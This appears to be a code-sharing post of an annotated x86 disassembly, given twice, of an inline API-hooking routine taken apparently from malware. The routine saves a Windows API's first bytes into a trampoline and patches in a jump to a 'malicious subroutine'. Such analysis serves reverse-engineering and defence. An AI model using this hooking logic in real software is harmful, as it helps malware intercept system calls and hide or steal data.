c0d3inj3cT · July 27, 2022 19:43
diff --git a/hookapi.asm b/hookapi.asm
 ESI - Function Pointer
 EDI - Buffer

 00C816F9   803E E9          CMP BYTE PTR DS:[ESI],0E9			; check if the first instruction of API is a jump instruction
 00C816FC   75 09            JNZ SHORT 00C81707
 00C816FE   8B46 01          MOV EAX,DWORD PTR DS:[ESI+1]
 00C81701   8D4430 05        LEA EAX,DWORD PTR DS:[EAX+ESI+5]
 00C81705   EB 12            JMP SHORT 00C81719
 00C81707   8D46 05          LEA EAX,DWORD PTR DS:[ESI+5]		; point eax to the 5th byte of the function
 00C8170A   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]	; store 5 bytes from the function into the buffer
 00C8170B   A4               MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
 00C8170C   8B7D 0C          MOV EDI,DWORD PTR SS:[EBP+C]		; edi = buffer
 00C8170F   8B75 08          MOV ESI,DWORD PTR SS:[EBP+8]		; esi = function pointer
 00C81712   C745 F8 05000000 MOV DWORD PTR SS:[EBP-8],5	
 00C81719   8B55 F8          MOV EDX,DWORD PTR SS:[EBP-8]
 00C8171C   2BC2             SUB EAX,EDX
 00C8171E   2BC7             SUB EAX,EDI
 00C81720   83E8 05          SUB EAX,5                                   ; eax = function pointer - buffer - 0x5
 00C81723   8D0C3A           LEA ECX,DWORD PTR DS:[EDX+EDI]	        ; buffer = buffer + 0x5
 00C81726   8941 01          MOV DWORD PTR DS:[ECX+1],EAX		; write above calculated value of eax in the buffer 
 00C81729   8B45 10          MOV EAX,DWORD PTR SS:[EBP+10]		; malicious subroutine
 00C8172C   2BC6             SUB EAX,ESI
 00C8172E   83E8 05          SUB EAX,5					; hooked api = hooked api - function pointer - 0x5
 00C81731   C601 E9          MOV BYTE PTR DS:[ECX],0E9			; write jump opcode to buffer
 00C81734   8946 01          MOV DWORD PTR DS:[ESI+1],EAX		; write the above calculated hooked api value to the function pointer + 1
 00C81737   8D45 F4          LEA EAX,DWORD PTR SS:[EBP-C]		
 00C8173A   50               PUSH EAX
 00C8173B   FF75 F4          PUSH DWORD PTR SS:[EBP-C]
 00C8173E   C606 E9          MOV BYTE PTR DS:[ESI],0E9			; write jump opcode to function pointer
	ESI - Function Pointer
	EDI - Buffer

	00C816F9 803E E9 CMP BYTE PTR DS:[ESI],0E9 ; check if the first instruction of API is a jump instruction
	00C816FC 75 09 JNZ SHORT 00C81707
	00C816FE 8B46 01 MOV EAX,DWORD PTR DS:[ESI+1]
	00C81701 8D4430 05 LEA EAX,DWORD PTR DS:[EAX+ESI+5]
	00C81705 EB 12 JMP SHORT 00C81719
	00C81707 8D46 05 LEA EAX,DWORD PTR DS:[ESI+5] ; point eax to the 5th byte of the function
	00C8170A A5 MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; store 5 bytes from the function into the buffer
	00C8170B A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
	00C8170C 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C] ; edi = buffer
	00C8170F 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] ; esi = function pointer
	00C81712 C745 F8 05000000 MOV DWORD PTR SS:[EBP-8],5
	00C81719 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]
	00C8171C 2BC2 SUB EAX,EDX
	00C8171E 2BC7 SUB EAX,EDI
	00C81720 83E8 05 SUB EAX,5 ; eax = function pointer - buffer - 0x5
	00C81723 8D0C3A LEA ECX,DWORD PTR DS:[EDX+EDI] ; buffer = buffer + 0x5
	00C81726 8941 01 MOV DWORD PTR DS:[ECX+1],EAX ; write above calculated value of eax in the buffer
	00C81729 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10] ; malicious subroutine
	00C8172C 2BC6 SUB EAX,ESI
	00C8172E 83E8 05 SUB EAX,5 ; hooked api = hooked api - function pointer - 0x5
	00C81731 C601 E9 MOV BYTE PTR DS:[ECX],0E9 ; write jump opcode to buffer
	00C81734 8946 01 MOV DWORD PTR DS:[ESI+1],EAX ; write the above calculated hooked api value to the function pointer + 1
	00C81737 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
	00C8173A 50 PUSH EAX
	00C8173B FF75 F4 PUSH DWORD PTR SS:[EBP-C]
	00C8173E C606 E9 MOV BYTE PTR DS:[ESI],0E9 ; write jump opcode to function pointer